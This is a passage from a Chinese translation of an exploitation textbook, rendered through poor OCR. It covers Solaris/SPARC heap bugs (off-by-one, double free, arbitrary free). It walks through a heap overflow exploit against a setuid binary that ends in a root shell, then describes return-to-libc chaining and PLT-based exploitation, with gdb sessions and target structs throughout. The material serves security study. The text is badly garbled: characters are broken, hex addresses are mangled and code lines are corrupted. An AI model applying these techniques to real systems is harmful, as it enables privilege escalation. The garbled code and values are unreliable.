malloc() 返 回 的 指针 ， 都 将 破坏 你 指定 的 地 址 。 可 以 利用 这 一 点 通过 堆 溢 出 实现 多 于 4B 的 改写 ， 
从 而 破解 另 一 些 棘 手 的 溢出 问题 。 

10.8 其 他 与 堆 相 关 的 漏洞 

还 有 其 他 利用 堆 数 据 结构 的 漏洞 。 下 面 介 绍 一 些 最 常见 的 漏洞 ,并 学 习 怎 样 破解 它们 来 获取 
执行 控制 。 | 
10.8.1 off-by-one 溢出 


类 似 于 栈 offby-one 溢 出 的 情形 ，Solaris 人 SPARC 上 的 堆 o 人 by-one 溢 出 也 非常 难 破 解 ， 主 要 是 
因为 字 节 序 的 问题 。off-by-one 在 堆 上 写 一 个 越界 的 空 字 节 绝对 不 会 影响 到 堆 的 完整 性 。 因 为 块 
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大 小 最 高 有 效 字 节 实际 上 是 零 ， 写 一 个 越界 的 空 字 节 不 会 对 它 产 生 影响 。 有 时 候 ， 有 可 能 越界 写 
一 个 任意 的 单字 节 。 这 将 破坏 对 块 大 小 最 高 有 效 字 节 。 假 若 这 样 的 话 ， 破 解 的 可 能 性 会 很 小 ， 因 
为 要 看 快要 破坏 时 堆 的 大 小 ， 以 及 是 否 能 在 有 效 的 地 址 发 现下 一 个 块 。 一 般 而 言 ， 要 想 破解 此 类 
漏洞 是 非常 困难 的 ， 儿 乎 不 可 能 。 

10.8.2 ”二 次 释放 漏洞 

在 某 些 情况 下 ，Solaris 的 二 次 释放 漏洞 是 可 以 被 破解 的 ， 然 而 ， 因 为 在 _free_unlockeq1() 
里 做 了 一 些 检查 ,破解 机 会 减少 了 。 其 中 有 些 检查 明显 是 针对 二 次 释放 漏洞 的 ,但 所 幸 的 是 (对 
攻击 者 而 言 ) 这 些 检查 并 不 完全 有 效 。 

第 一 个 检查 的 内 容 是 被 释放 的 块 是 不 是 最 后 一 个 被 释放 的 块 (Lfree)。 随 后 ， 检 查 待 释放 的 
块 的 块头 部 ， 以 确定 它 还 没有 被 释放 必须 设置 大 小 字段 的 最 低位 )。 第 三 个 也 是 最 后 的 检查 是 
针对 二 次 释放 漏洞 的 ， 将 确定 被 释放 的 块 不 在 空闲 列表 内 。 如 果 三 个 检查 都 通过 了 ， 将 把 这 个 块 
放 进 空 闪 列表， 最 终 传 给 realfree ()。 

为 了 破解 二 次 释放 漏洞 , 必须 在 第 一 次 和 第 二 次 释放 之 间 的 某 个 时 候 刷 新 空闲 列表 。 这 可 能 
是 malloc 或 realloc 调 用 的 结果 , 或 者 如 果 连 续 发 生 32 次 释放 ， 将 导致 列表 的 一 部 分 被 刷新 。 第 
一 次 释放 必须 引起 这 个 块 和 前 一 块 反 向 合并 ,以 便 原 始 的 指针 驻 留 在 有 效 堆 块 的 中 间 。 这 个 有 效 
的 堆 块 必须 被 malloc 再 分 配 ， 然 后 被 攻击 者 控制 的 数据 填充 。 这 样 的 话 ， 重 设 块 大 小 的 低位 就 
可 以 绕 过 free() 内 的 第 二 个 检查 。 当 二 次 释放 漏洞 发 生 时 ， 它 将 指向 用 户 控 制 的 数据 ， 从 而 导 
致 任意 内 存 改写 。 虽 然 这 种 情形 对 你 我 来 说 似乎 不 太 可 能 ,但 在 Solaris 的 堆 实 现 上 破解 二 次 释放 
漏洞 是 有 可 能 的 。 

10.8.3 ”任意 释放 漏洞 

任意 释放 漏洞 指 的 是 允许 攻击 者 直接 指定 传 给 free() 的 地 址 的 编码 错误 。 这 看 起 来 有 点 像 
新 手 所 犯 的 可 笑 的 编码 错误 ， 但 当 释 放 未 初始 化 的 指针 时 ， 或 者 像 在 “union mismanagement” 漏 
洞 中 那样 将 一 种 类 型 指针 误 认为 是 另 一 种 类 型 指针 时 ， 将 出 现 这 个 漏 澜 。 

关于 构造 目标 缓冲 区 的 方式 ， 任 意 释 放 漏 洞 和 标准 堆 溢 出 非常 类 似 。 目 标 是 通过 t_qelete 

用 假 的 下 一 个 块 完成 向 前 合并 攻击 ， 就 像 前 面 详 细 描述 的 那样 。 然 而 ， 为 了 实现 对 任意 释放 漏 
洞 的 攻击 ， 有 必要 精确 指出 你 的 块 在 内 存 中 的 位 置 。 如 果 你 正 设法 释放 的 伪造 块 位 于 进程 堆 的 某 
些 随机 位 置 ， 这 可 能 会 很 困难 。 
”幸运 的 是 Solaris 堆 实现 对 传递 给 free () 的 值 执行 非 指针 校 验 。 这 些 指 针 可 能 位 于 堆 、 栈 、 静 
态 数据 或 其 他 内 存 区 域 ， 它 们 很 乐意 通过 堆 实现 释放 。 如 果 可 以 在 静态 数据 或 栈 上 找到 一 个 可 靠 
的 位 置 ， 并 把 它 作 为 地 址 传递 给 free()， 那 么 ， 应 该 想 尽 一 切 办 法 来 实现 。 堆 实现 将 通过 发 生 
在 块 上 的 正常 处 理 使 它 被 释放 ， 而 这 将 改写 你 指定 的 任意 地 址 。 


10.9 堆 溢 出 的 例子 
用 真实 的 例子 讲解 会 使 理论 知识 更 易于 理解 。 为 了 加 强 和 示范 迄今 为 止 所 讨论 过 的 破解 技 
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术 ， 我 们 来 看 一 个 容易 的 、 适 合 堆 溢出 的 破解 。 


脆弱 的 程序 
这 个 漏洞 非常 明显 ， 在 现代 软件 中 一 般 不 会 出 现 。 我 们 再 次 以 一 个 脆弱 的 setuid 可 执行 文 
件 为 例 ， 它 由 于 复制 程序 的 第 一 个 参数 而 产生 基于 字符 串 的 溢出 。 脆 弱 的 函数 是 : 
int vulnerable_function(char *userinput) { 
char *buf = malloc(64); 
char *buf2 = malloc(64); 
strepy (buf,userinput); 
free (buf2); 
buf2 = malloc(64); 


return 1; 


} 

缓冲 区 buf 用 于 从 没有 限制 的 字符 串 复 制 目 的 地 溢出 到 以 前 分 配 的 缓冲 区 puf2。 然 后 ， 堆 组 
冲 区 buf2 被 释放 ， 另 外 ， 对 malloc 的 调用 将 刷新 空闲 列表 。 我 们 有 两 个 函数 返回 ， 因 此 可 以 选 
择 改 写 保存 在 栈 上 的 程序 计数 器 ， 而 且 确 实 应 该 选择 它 。 我 们 还 有 另外 一 个 选择 ， 就 是 改写 前 面 
提 到 的 作为 exit () 库 函数 调用 一 部 分 的 函数 指针 调用 。 

首先 触发 这 个 溢出 。 这 个 堆 缓 冲 区 是 64B 的 ， 因 此 ， 向 它 提交 65B 的 字符 串 数据 就 可 以 引起 
程序 朋 省 。 

# gdb ./heap_overflow 

GNU gdb 4.18 

Copyright 1998 Free Software Foundation, Inc. 


GDB is free software, covered by the GNU General Public License, and you 
Are welcome to change it and/or distribute copies of it under certain conditions. 





Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB. Type "show warranty" for details. 
This GDB was configured as "sparc-sun-solaris2.8"...(no debugging symbols found)... 


(gdb) r ‘perl -e "print 'A' x 64"* 

Starting program: /test/./heap overflow ‘perl -e "print 'A' x 64"* 
(no debugging symbols found)...(no debugging symbols found)...(no 
debugging symbois found)... 

Program exited normally. 





(gdb) r ‘perl -e "print 'A' x 65"* 

Starting program: /test/./heap overflow ‘perl -e "print 'A' x 65"^ 
(no debugging symbols found)...(no debugging symbols found)...íno 
debugging symbols found)... 

Program received signal SIGSEGV, Segmentation fault. 


Oxff2c2344 in realfree () from /usr/lib/libc.so.1 
(gdb) x/i $pc 
Oxff2c2344 <realfreet+116>: ld [ $15 + 8 1, $o1 


(gdb) print/x $15 
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$1 = 0x41020ac0 


在 65B 处 ， 块 大 小 最 高 有 效 字 节 被 A〈 或 表示 为 0x41) BR, GF Mrealfree() RER 
此 我 们 可 以 动手 构造 一 个 用 负数 改写 块 大 小 的 破解 代码 ， 在 块 大 小 之 后 创建 一 个 伪造 的 TREE 结 
构 。 这 个 破解 代码 包含 下 列 与 具体 平台 相关 的 代码 : 
struct { 
char *name; 
int buffer_length; 
unsigned long overwrite_location; 
unsigned long overwrite_value; 
int align; 
} targets[] = { 


{ 
"Solaris 9 Ultra-Sparc", 
64, 
Oxffbf1233, 
Oxffbffcc4, 
0 


up 

在 这 个 例子 里 ，overwrite_location 是 要 改写 的 内 存 地 址 ，overwrite_value 是 用 来 改写 
它 的 值 。 这 个 特殊 的 破解 当场 构造 TREE 结 构 ，overwrite_location 类 似 于 结构 中 的 sp， 而 
overwrite value 对 应 tp。 再 次 提醒 大 家 ， 因 为 这 是 破解 本 地 的 可 执行 文件 ， 破 解 代 码 将 把 
shellcode 保 存在 环境 变量 里 。 开始 后 , 破解 将 用 不 以 4B 对 齐 的 地 址 初始 化 overwrite_location。 
当 写 向 那个 地 址 时 将 会 立即 引起 Bus 故 障 ， 为 了 完成 这 个 破解 ， 我 们 可 以 在 正确 的 程序 内 检查 内 
存 ， 并 在 定位 所 需要 的 信息 的 地 方 中 断 。 第 一 次 运行 破解 时 将 输出 下 列 内 容 : 


Program received signal SIGBUS, Bus error. 


Oxff2c272c in t delete () from /usr/lib/libc.so.1 
(gdb) x/i Spe 
Oxff2e272c <t_delete+52>: st $o0, [ %o1 + 8 ] 


(gdb) print/x $01 

$1 - Oxffbf122b 

(gdb) print/x $00 

$2 = Oxffbffcc4 

(gdb) 

当 试图 写 到 没有 正确 对 齐 的 内 存 地 址 时 ， 生 成 的 STGBUs 信 和 号 将 导致 程序 终 正 。 正 如 你 看 到 
的 那样 ， 写 到 的 实际 地 址 〈0xfftbf122b+8) 对 应 overwrite_location 的 值 ， 这 个 被 改写 的 值 
也 是 我 们 前 面 指定 的 。 现 在 ， 定 位 shellcode 和 改写 适当 目标 的 问题 变 得 简单 了 。 

在 栈 项 附近 可 以 再 次 发 现 我 们 的 shellcode， 这 次 与 对 齐 位 置 错 开 了 3B。 

(gdb) 

OxEEDE F248: 0x01108001 0x01108001 0x01108001 0x01108001 
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Oxffbffa58: 0x01108001 0x01108001 0x01108001 0x01108001 
Oxffbffa68: 0x01108001 0x01108001 0x01108001 0x01108001 


为 了 获取 程序 控制 ， 我 们 将 设法 改写 栈 上 保存 的 程序 计数 器 值 。 因 为 环境 变量 大 小 的 改变 ， 
程序 的 栈 可 能 会 稍微 有 些 改变 ,我 们 将 把 目标 结构 里 的 对 齐 值 调 整 3B， 并 再 次 运行 破解 。 一 旦 完 
成 这 些 操作 ， 定 位 接近 崩溃 的 精确 返回 地 址 将 相对 容易 一 些 。 


(gdb) bt 

#0 Oxff2c272c in t delete () from /usr/lib/libc.so.i 

#1  0xff2c2370 in realfree () from /usr/lib/libc.so.1 

42  Oxff2cleb4 in malloc unlocked () from /usr/lib/libc.so.1 
43  Oxff2clc2c in malloc () from /usr/lib/libc.so.1 


#4 Ox107bc in main () 
#5  0x10758 in frame dummy () 


backtrace 将 输出 适当 的 栈 帧 列表 供 我 们 选择 。 这 样 ， 我 们 就 能 得 到 改写 这 些 帧 之 中 的 保存 
的 程序 计数 器 所 需要 的 信息 。 对 这 个 例子 ， 可 以 试用 帧 数 4。 调 用 树 越 入 上， 函数 寄存 器 的 窗口 
越 有 可 能 被 刷新 入 栈 ， 不 过 ， 第 5 帧 的 函数 从 来 不 返回 。 

(gdb) i frame 4 

Stack frame at Oxffbff838: 

pc = 0x107bc in main; saved pc 0x10758 

(FRAMELESS), called by frame at Oxffbff8b0, caller of frame at Oxffbff7cO 

Arglist at Oxffbff838, args: 

Locals at Oxffbff838, 

(gdb) x/16x Oxffbff838 


Oxffbff838: 0x0000000c Oxff33c598 0x00000000 
0x00000001 
Oxffbff848: 0x00000000 0x00000000 0x00000000 
Oxff3f66c4 
Oxffbff858: 0x00000002 Oxffbff914 Oxffbff920 
0x00020a34 
Oxffbff868: 0x00000000 0x00000000 Oxffbff8b0 


0x0001059c 
(gdb) 10 


栈 帧 开头 的 16 个 字 是 保存 的 寄存 器 窗口 ， 位 于 最 后 的 是 保存 的 指令 指针 。 在 这 个 例子 里 ， 这 
个 值 是 0x1059c， 位 于 0xffbff874 处 。 现 在 ， 我 们 收集 了 完成 破解 所 需要 的 信息 。 最 终 的 目标 


结构 看 起 来 像 下 面 这 样 : 


struct { 
char *name; 
int buffer_length; 
unsigned long overwrite_location; 
unsigned long overwrite_value; 
int align; 

} targets[] = { 


"Solaris 9 Ultra-Sparc", 
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64, 
Oxffbff874, 
Oxffbffa48, 
3 


3 
现在 ， 试 一 下 这 个 破解 ， 验 证 它 是 否 像 我 们 预期 的 那样 工作 ， 执 行 下 列 操作 : 


$ ls -al heap overflow 

-YWSr-xr-x 1 root other 7028 Aug 22 00:33 heap_overflow 
$ ./heap_exploit 0 

# id 

uid=0 (root) gid=60001 (nobody) 

# 


这 个 破解 就 像 预 期 的 那样 工作 良好 , 我们 可 以 执行 任意 代码 。 虽 然 堆 破 解 比 栈 溢出 的 例子 稍 
微 复杂 一 些 , 但 它 再 次 为 破解 提供 了 最 佳 案例 。 前面 提 到 的 复杂 性 很 可 能 出 现在 更 为 复杂 的 破解 
情形 里 。 


10.40 ”破解 Solaris 的 其 他 方法 


下 面 讨论 另外 一 些 涉 及 Solaris 系 统 的 重要 技术 。 其 中 之 一 就 是 非常 有 可 能 碰 到 的 不 可 执行 
栈 。 但是, 不 论 是 在 Solaris 上 ,还 是 在 其 他 操作 系统 上 ， 我们 都 能 战胜 这 些 保 护 措施 。 擦 亮 眼 睛 ， 
看 看 我 们 是 怎么 做 的 吧 。 


10.10.1 静态 数据 溢出 

对 破解 来 说 , 在 静态 数据 里 而 不 是 在 堆 或 栈 上 发 生 的 溢出 一 般 更 球 手 。 必 须根 据 个 案 来 评价 
它们 ; 为 了 在 静态 内 存 的 目标 缓冲 区 附近 找到 有 用 的 变量 ， 必 须 检查 二 进 制 文件 。 然 而 ， 检 查 源 
码 并 不 能 准确 知道 静态 变量 在 二 进 制 文件 里 的 组 织 情 形 ， 要 想 确 定数 据 正 滋 出 到 哪里 ， 唯 一 可 靠 
和 有 效 的 方法 是 进行 二 进 制 分 析 。 对 于 破解 静态 数据 溢出 来 说 ， 有 一 些 标准 的 方法 很 有 效 。 

如 果 你 的 目标 缓冲 区 确实 是 在 .aata 区 段 内 ， 而 不 是 在 .bss 内 ， 则 数据 很 有 可 能 越过 缓冲 区 
的 边界 溢出 到 .dators 区 段 里 ， 而 且 那 里 正好 有 一 个 stop 函 数 指针 。 程 序 退 出 时 将 调用 这 个 函数 
指针 。 在 exit () 前 倘若 没有 引起 程序 般 溃 的 数据 被 改写 ， 当 程序 退出 时 ， 改 写 的 stop 函 数 指针 
将 被 调用 ， 从 而 执行 任意 代码 。 

如 果 你 的 缓冲 区 未 被 初始 化 且 位 于 .bss 区 段 内 ， 你 可 以 选择 改写 .bss 区 段 内 具体 的 程序 数 
据 ， 或 者 滋 出 .bss 并 改写 堆 。 
10.10.2 ” 绕 过 不 可 执行 栈 保护 

现在 的 Solaris 操 作 系统 可 以 将 栈 设置 为 不 可 执行 。 设 置 后 ， 如 果 破 解 企图 在 栈 上 执行 代码 则 
会 引起 访问 违例 ， 而 受 影响 的 程序 将 会 骨 演 。 然而， 这 个 保护 措施 并 没有 扩展 到 堆 或 静态 数据 区 
域 。 一 般 来 说 ， 这 类 保护 措施 只 是 破解 过 程 中 微不足道 的 障碍 。 
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把 shellcode 保 存在 堆 上 或 其 他 可 写 的 内 存 区 域 里 有 时候 是 可 行 的 , 然后 可 以 把 执行 流 重 定 向 
到 那个 地 址 。 假 若 这 样 ， 不 可 执行 栈 保 护 就 变 得 不 重要 了 。 如 果 溢 出 是 字符 串 复制 操作 的 结果 ， 
这 也 许 不 可 能 ， 因 为 堆 地 址 中 通常 会 包含 空 字 节 。 在 这 个 例子 里 ，John McDonald 发 明 的 返回 libe 
方法 的 变种 也 许 对 此 有 用 。 他 描述 了 通过 用 必要 的 函数 参数 生成 伪造 栈 帧 的 链 式 库 调 用 的 方法 。 
例如 ， 如 果 你 想 在 exec 之 后 调用 libc 函 数 setuid， 就 需要 创建 一 个 包含 在 输入 寄存 器 里 的 第 一 个 
RM (setuid) 正确 参数 的 栈 帧 , 返回 或 重 定向 执行 到 libc.so.1 的 setuid。 然 而, 不 是 从 setuiqd 
的 开头 直接 执行 代码 ， 而 是 在 save 函 数 后 在 函数 里 执行 代码 。 这 防止 改写 输入 寄存 器 ， 将 从 输入 
寄存 器 的 当前 状态 获取 函数 的 参数 ， 你 可 以 通过 构造 栈 帧 控制 它 。 你 创建 的 栈 帧 应 该 把 setuia 
的 正确 参数 载 入 输入 寄存 器 。 它 〈 你 创建 的 栈 帧 ) 也 应 该 包含 连接 另外 的 专门 为 exec 设 置 保存 的 
寄存 器 的 帧 指针 。 在 栈 帧 里 的 保存 的 程序 计数 器 (8%i7) 应 该 在 exec+4 字 节 处 , 正好 可 以 跳 过 save 
指令 。 

当 setuid 被 执行 时 ， 它 将 返回 exec 并 从 下 一 个 栈 帧 中 恢复 保存 的 寄存 器 。 用 这 种 方式 把 多 
个 库 函 数 串 起 来 并 完整 地 指定 它们 的 参数 是 有 可 能 的 ， 这 样 就 可 以 绕 过 不 可 执行 栈 保 护 。 然 而 ， 
为 了 把 它们 串 起 来 ， 必 须知 道 库 函 数 的 明确 位 置 以 及 栈 帧 的 明确 位 置 。 这 样 的 话 ， 这 种 攻击 方法 
对 于 本 地 利用 或 可 重复 的 利用 ， 以 及 已 知 被 利用 系统 细节 的 情况 ， 都 很 有 用 。 除 此 之 外 ， 这 个 技 
术 的 作用 可 能 有 限 。 
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虽然 SPARC 的 某 些 特性 《例如 寄存 器 窗口 ) 可 能 与 我 们 熟悉 的 x86 大 相 径 庭 ， 可 一 旦 理解 了 
基础 性 概念 ， 就 会 发 现 其 实在 破解 方法 上 还 是 有 很 多 类 似 的 地 方 。 虽 然 off-by-one 错 误 的 破解 因 
为 big-endian 字 节 序 的 特性 变 得 更 加 困难 ， 但 实际 上 其 他 的 漏洞 用 类 似 于 其 他 操作 系统 和 结构 体 
系 的 方法 是 可 以 破解 的 。SPARC 上 的 Solaris 具 有 一 些 特殊 的 漏洞 ， 但 它 也 是 定义 明确 的 结构 体系 
和 操作 系统 ， 这 里 描述 的 大 部 分 技术 在 大 多 数 情 形 下 都 可 以 工作 。 堆 实现 的 复杂 性 使 破解 成 为 可 
能 ， 还 存在 许多 破解 方法 。 本 章 因为 篇 幅 的 关系 没有 提 及 更 多 的 破解 技术 ， 但 你 会 有 很 多 了 解 破 
解 技术 的 机 会 。 
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章 介 绍 利 用 动态 链接 程序 的 高 级 Solaris 破 解 技 术 ， 以 及 怎样 生成 加 密 的 shellcode 来 挫 
败 网 络 IDS (Intrusion Detection System) 和 IPS (Intrusion Prevention System) 设备 。 
SPARC ABI 对 动态 链接 有 详细 的 说 明 ， 为 了 更 全 面 地 掌握 这 些 概念 并 学 习 动态 链接 怎样 在 
多 种 结构 体系 和 系统 下 工作 ,建议 你 仔细 读 一 下 这 个 文档 ( 见 http://www.sun.com/software/solaris/ 
programs/abi/)。 本 章 只 介绍 在 Solaris / SPARC 环 境 下 构造 新 破解 方法 所 必需 的 详细 资料 。 
在 Linux 里 通过 改写 Global Offset Table (GOT) 入 口 来 获取 执行 控制 的 方法 是 行 之 有 效 的 ， 
并 且 已 在 公开 或 私下 的 破解 代码 里 被 广 为 使 用 。 它 是 迄今 为 止 破解 Wite-to-anywhere-in-memory 
HERE (例如 格式 化 串 错误 、 堆 游 出 等 ) 最 健壮 、 最 可 靠 的 方法 。 破 解 这 类 漏洞 的 经 典 方法 不 
外 平 改写 保存 的 返回 地 址 。 保 存在 线程 栈 里 的 返回 地 址 在 各 种 执行 环境 下 都 有 所 不 同 , 为 了 找 出 
它 所 在 的 位 置 ， 通 常 需要 借助 暴力 猜测 等 方法 。 因 此 ， 对 各 类 错误 来 说 ， 在 Linux 和 BSD 操 作 系 
统 里 更 改 GOT 是 最 好 的 破解 方法 。 但 是 ， 因 为 Solaris/SPARC 的 动态 链接 和 其 他 平台 完全 不 辣 ， 
这 个 方法 并 不 能 用 在 Solaris/SPARC 上 。 在 SPARC 上 ，GOT 不 包含 任何 直接 引用 对 象 里 的 符号 的 
有 效 虚拟 地 址 。 我 们 将 介绍 作为 符号 的 函数 〈 例 如 printf) 和 动态 函数 库 〈 例 如 1ibc.so)， 它 
们 将 作为 对 象 被 映射 到 线程 的 地 址 空间 。 
对 Solaris/SPARC 架 构 体 系 来 说 ， 假 设 我 们 正在 处 理 的 是 后 期 连接 。 在 后 期 连接 里 ， 链 接 程 
序 在 接 到 请 求 时 才 分 解 符号 ， 而 不 是 在 执行 开始 时 分 解 。 不 必 担 心 ， 后 期 连接 是 默认 行为 。 
Procedure Linkage Tabel (PLT) 用 于 在 所 有 的 内 存 映射 对 和 象 里 寻找 符号 地 址 。 对 在 所 有 对 象 
的 .text 区 段 里 被 引用 的 符号 的 初始 请 求 ，PLT 将 用 描述 符号 的 偏 移 把 控制 权 传 给 动态 链接 程序 
(在 Solaris 中 是 1d， so.1). 


注解 我 们 不 用 符号 号 名 ， 而 是 用 代表 符号 的 在 PLT 里 位 置 的 偏 移 . 这 是 一 种 微妙 的 差别 ， 将 对 破 
解 产 生 深 远 影 影响 


“借助 动态 链接 程序 He D; BRAT MOT Se £s $ 构 的 链接 列表 进行 符号 分 解 然后 利用 散 列 和 链表 搜 
索 每 个 对 象 的 动态 符号 〈.dynsym) 表 。 散 列 和 链表 通过 查看 对 象 的 动态 字符 串 〈.aynstr) X, 
检验 这 个 请 求 是 否 满 足 条 件 。 

动态 字符 串 表 包含 了 真正 的 字符 串 和 符号 名 。 链 接 程序 通过 对 正确 对 象 的 适当 入 口 做 简单 
的 字符 串 比较 来 确定 请 求 是 否 匹 配 。 如 果 字 符 串 不 匹配 ， 且 链表 没有 更 多 的 入 口 时 ,链接 程序 移 
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到 链接 列表 里 的 下 一 个 对 象 继 续 查 找 ， 直 到 请 求 被 满足 。 

在 分 解 〈 或 定位 ) 符号 之 后 ， 动 态 链接 程序 用 指令 修补 请 求 符 号 的 PLT 入 口 。 万 一 它 随后 被 
请 求 ， 这 些 新 修补 的 指令 将 使 程序 跳 到 符号 的 再 分 配 地 址 上 。 这 很 好 ， 因 为 当 我 们 再 次 碰 到 它们 
时 ， 就 不 需要 再 次 执行 疯狂 的 动态 链接 过 程 了 。 与 Linux glibc 动 态 链接 程序 实现 〈 用 新 分 解 的 符 
号 位 置 更 新 GOT 入 口 ) 不 同 ，Solaris 动 态 链接 程序 用 真正 的 指令 修补 PLT。 这 些 指令 使 程序 直接 
跳 到 映射 对 象 的 .text 区 段 内 的 位 置 。 为 了 进一步 破解 构造 会 话 ， 必 须 掌 握 x86 上 的 Linux 和 
SPARC 上 的 Solaris 之 间 的 主要 差异 。 

因为 是 用 指令 〈 我 们 这 里 谈论 的 是 操作 码 ， 而 不 是 地 址 ) 修补 PLT， 所 以 用 指向 shellcode 的 
地 址 改写 入 口 将 不 会 成 功 。 因 此 ， 我 们 更 乐意 用 真正 的 指令 改写 PLT。 但 是 ， 这 未 必 总 是 可 行 ， 
因为 jump 或 call 指 令 位 移 与 它 当前 的 位 置 相关 。 正 如 你 推测 的 那样 ， 从 改写 的 PLT 入 口 很 难 定位 
shellcode 的 相对 距离 。 在 堆 溢出 中 ， 不 能 改写 任何 PLT 入 口 ， 因 为 放 在 内 存 里 的 两 个 长 整数 应 该 
是 线程 地 址 空间 内 的 有 效 地 址 。 如 果 忘 了 怎么 做 ， 请 复习 第 5 章 介 绍 的 Linux 上 的 堆 溢出 。 
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必要 的 背景 知识 介绍 完了 , 你 应 该 理解 当前 与 破解 有 关 的 限制 。 我 们 将 示范 攻击 堆 和 格式 化 
串 的 更 可 靠 、 更 健壮 的 新 方法 。 我 们 将 单 步 执 行 (singe step) 运行 中 的 动态 链接 程序 ， 这 将 显示 
链接 程序 的 功能 性 所 不 可 缺少 的 许多 派遣 〔 跳 转 ) 表 。 单 步 执 行 用 于 需要 精确 控制 指令 执行 的 场 
合 。 在 每 条 指令 执行 时 ， 控 制 传 回调 试 器 ， 反 汇编 下 一 条 要 执行 的 指令 。 在 继续 执行 之 前 ， 你 必 
须 在 这 点 输入 数据 。 这 些 包含 内 部 函数 指针 的 表 位 于 每 个 线程 地 址 空间 的 相同 位 置 。 这 可 是 远程 
攻击 者 梦想 中 的 宝贝 一 一 可 靠 又 常 驻 的 函数 指针 。 

反 汇编 并 单 步 执行 下 面 的 例子 ， 找 出 Solaris/SPARC 可 执行 文件 的 新 破解 方法 。 


<linkme.c> 








#include <stdio.h> 


int 
main (void) 


{ 
printf ("hello world! \n"); 
printf ("uberhax0r rux!\n"); 


} 


bash-2.03# gcc -o linkme linkme.c 
bash-2.03# gdb -q linkme 

(no debugging symbols found)... (gdb) 
(gdb) disassemble main 

Dump of assembler code for function main: 
0x10684 «main»: save  $sp, -112, %sp 
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0x10688 <maint+4>: sethi %hi(0x10400), $00 

0x1068c <main+8>: or $00, 0x358, $00 ! 0x10758 
« lib version-«8» 

0x10690 «main-*12»: call 0x20818 <printf> 

0x10694 <main+16>: nop 

0x10698 <main+20>: sethi %hi(0x10400), %o0 

0x1069c <main+24>: or %00, 0x368, $o0 z ! 0x10768 
« lib version*24» 

Ox106a0 «main-28»: call 0x20818 <printf> 

0x106a4 <main+32>: nop 

0x106a8 <main+36>: mov %00, %i0 

Ox1l06ac <main+40>: nop 

0x106b0 <main+44>: ret . 

Ox106b4 <main+48>: restore 

0x106b8 <maint+52>: retl 

0x106bc <main+56>: add %o7, $17, $17 


End of assembler dump. 
(gdb) b *main 
Breakpoint 1 at 0x10684 


(gdb) r 
Starting program: /BOOK/linkme 
(no debugging symbols found)...(no debugging symbols found)... 


(no debugging symbols found)... 
Breakpoint 1, 0x10684 in main () 
(gdb) x/i *main+12 


0x10690 <main+12>: call 0x20818 <printf> 

(gdb) x/4i 0x20818 

0x20818 «printf»: sethi  $hi(0x1e000), %g1 

0x2081c «printf-*4»: b,a 0x207a0 « PROCEDURE, LINKAGE TABLE » 
0x20820 <printf+8>: nop 

0x20824 <printf+12>: nop 


这 是 printf () 在 PLT 里 的 原始 入 口 , printf 在 那里 第 一 次 被 引用 。 用 0x1e000 的 偏 移 量 设置 


%g1 寄 存 器 ， 然 后 跳 到 PLT 里 的 第 一 个 入 口 。 这 将 设置 输出 参数 ， 并 用 到 动态 链接 程序 的 分 解 函 


数 。 


(gdb) b *0x20818 

Breakpoint 2 at 0x20818 

(gdb) display/i $pc 

1: x/i $pc 0x10684 «main»: save %sp, -112, %sp 
(gdb) c 


接 下 来 ， 继 续 为 printf() 函数 的 PLT 入 口 设 置 断 点 。 


Breakpoint 2, 0x20818 in printf () 





1: x/i Špec 0x20818 «printf»: sethi  $hi(0x1e000), %g1 

(gdb) x/4i $pc 

0x20818 «printf»: sethi  $hi(0x1e000), %g1 

Ox2081c <printf+4>: b,a 0x207a0 « PROCEDURE LINKAGE TABLE > 
0x20820 «printf-*8»: nop 


0x20824 <printf+12>: nop 
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(gdb) c 
Continuing. 
hello world! 


printf 第 一 次 从 .text 区 有 段 被 引用 并 进入 PLT， 把 执行 重 定向 到 动态 链接 程序 映射 的 内 存 映 
像 中 。 动 态 链接 程序 分 解 函数 (printf) 在 映射 对 象 〈 这 个 例子 中 是 1ibc.soe) 里 的 位 置 ， 并 将 
执行 代码 引 到 这 个 位 置 。 当 有 任何 对 printf 更 进一步 的 引用 时 ， 动 态 链接 程序 也 用 将 跳 到 libe 
printf 入 口 的 指令 修补 printf 的 PLT 入 口 。 你 从 下 面 的 反 汇 编 代 码 中 即 可 看 到 , 动态 链接 程序 更 
改 了 printf 的 PLT 入 口 。 注 意 0xff304418 这 个 地 址 ， 它 是 printf 在 libc .so 里 的 位 置 。 接 下 来 
是 检验 printf 在 libc .so 里 的 真正 位 置 的 方法 。 


Breakpoint 2, 0x20818 in printf () 
1: x/i $pc 0x20818 «printf»: Sethi  $hi(0x1e000), %g1 
(gdb) x/4i $pc 


0x20818 «printf»: sethi %hi(0xle000), %g1 

0x2081c <printf+4>: sethi %hi(0xff£304400), %g1 

0x20820 <printf+8>: jmp %gl + 0x18 ! Oxff304418 <printf> 
0x20824 <printf+i2>: nop 

FF280000 672K read/exec /usr/lib/libc.so.1 


接 下 来 看 看 在 hello wor1ld 例 子 中 libc 被 映射 到 何 处 。 


bash-2.03# nm -x /usr/lib/libc.so.1 grep printf 

[3762] |0x00084290|0x00000188|FUNC |GLOB |o |9 |_fprintf 

[593] |0x00000000]0x00000000|FILE |LOCL [0 | ABS |_sprintf_sup.c 
[4756]  |0x00084290|0x00000188|FUNC |WEAK |0 [9 | fprintf 

[2185] [{0x00000000|0x00000000|FILE |LOCL |0 |ABS | £printf.c 
[4718] ]|0x00084cbc|0x000001c4|FUNC |GLOB |o |9 | fwprintf 
[3806] |0x00084418|0x00000194|FUNC |GLOB |0 [9 [printf 





| 


|->> printf() within 1ibc.so 


下 面 的 计算 将 得 出 printf () 在 例子 中 地 址 空间 里 的 精确 位 置 。 
bash-2.03# gdb -q 

(gdb) printf "Ox%.8x\n", 0x00084418 + OxFF280000 
0xff304418 


地 址 0xff304418 是 printf() 在 例子 中 的 精确 位 置 。 如 预期 那样 ,动态 链接 程序 用 printf () 
在 线程 地 址 空间 的 精确 地 址 里 更 新 PLT 的 printf 入 口 。 

下 面 深 入 研究 动态 链接 过 程 ， 进 一 步 了 解 破解 技术 。 我 们 将 重新 启动 这 个 应 用 程序 ， 在 
printf() 的 PLT 入 口 设置 断 点 ， 从 这 里 单 步 跟 踪 到 动态 链接 程序 里 面 。 


(gdb) b *0x20818 

Breakpoint 1 at 0x20818 

(gdb) r 

Starting program: /BOOK/./linkme 

(no debugging symbols found)...(no debugging symbols found)... 
(no debugging symbols found)... 

Breakpoint 1, 0x20818 in printf () 
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(gdb) display/i $pc 

1: x/i $pc 0x20818 «printf»: sethi $hi(0x1e000), $g1 
(gdb) si 

0x2081c in printf () 

1: x/i $pc  0x2081c <printf+4>: b,a 0x207a0 

« PROCEDURE LINKAGE TABLE > 








